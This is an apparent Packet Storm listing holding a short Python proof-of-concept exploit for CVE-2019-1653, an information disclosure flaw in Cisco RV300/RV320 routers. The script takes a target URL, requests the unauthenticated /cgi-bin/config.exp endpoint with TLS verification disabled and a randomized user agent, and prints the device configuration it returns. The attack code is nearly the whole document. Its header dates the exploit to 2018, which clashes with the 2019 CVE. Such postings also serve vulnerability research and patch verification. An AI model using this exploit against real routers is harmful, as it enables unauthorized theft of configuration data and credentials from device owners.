Cisco RV300 and RV320 suffer from an information disclosure vulnerability.
f64b5564266a9a3f68710710054b391969d788fb5b5f9320aaa4b6b9e833b265# Exploit Title: 6coRV Exploit
# Date: 01-26-2018
# Exploit Author: Harom Ramos [Horus]
# Tested on: Cisco RV300/RV320
# CVE : CVE-2019-1653
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from fake_useragent import UserAgent
def random_headers():
return dict({'user-agent': UserAgent().random})
def request(url):
r = requests.Session()
try:
get = r.get(url, headers = random_headers(), timeout = 5, verify=False)#, allow_redirects=False
if get.status_code == 200:
return get.text
except requests.ConnectionError:
return 'Error Conecting'
except requests.Timeout:
return 'Error Timeout'
except KeyboardInterrupt:
raise
except:
return 0
print("")
print("##################################################")
print("CISCO CVE-2019-1653 POC")
print("From H. with love")
print("")
url = raw_input("URL> EX:https://url:port/ ")
url = url + "/cgi-bin/config.exp"
print(request(url))
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed